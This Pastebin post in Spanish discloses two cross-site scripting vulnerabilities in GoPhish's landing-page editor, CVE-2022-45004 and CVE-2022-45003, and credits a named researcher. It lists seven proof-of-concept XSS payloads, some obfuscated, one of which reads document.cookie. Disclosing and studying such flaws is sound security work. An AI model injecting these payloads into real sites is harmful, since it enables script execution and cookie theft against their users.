Advertisement
Guest User

Untitled

a guest
Jan 5th, 2023
2,662
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.99 KB | None | 0 0
  1. La vulnerabilidad se encuentra en la última versión y anteriores de GoPhish (https://github.com/gophish/gophish).
  2.  
  3. CVE: CVE-2022-45004
  4.  
  5. Para explotar la vulnerabilidad es necesario descargar la herramienta y crear una nueva "LANDING PAGE".
  6. > Introducir uno a uno los siguientes payloads:
  7.  
  8. onMouseOver=<script>alert("/XSS BY Y000!/")</script>
  9. <input onblur=top[/al/.source+/ert/.source]("_Y00!_") autofocus><input autofocus>
  10. <input onblur=["_Y00!_"].find(alert) autofocus><input autofocus>
  11. <input onblur=(((confirm)))("_Y00!_") autofocus><input autofocus>
  12. <form><button formaction=javascript&colon;alert('xss_by_Y000!')>_Y000!_
  13. <Img src="/" =_=" title=" onerror='prompt(document.cookie)'">
  14.  
  15.  
  16. CVE-2022-45003
  17.  
  18. Para explotar la vulnerabilidad es necesario descargar la herramienta y crear una nueva "LANDING PAGE".
  19. > Introducir el siguiente payload:
  20.  
  21. " autofocus '-->--!><Input/Autofocus/*/Onfocus=document.location=``;alert`_Y000!_`//>
  22.  
  23.  
  24.  
  25.  
  26.  
  27. Vulnerability Discover: Mikel Hernández Alonso
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement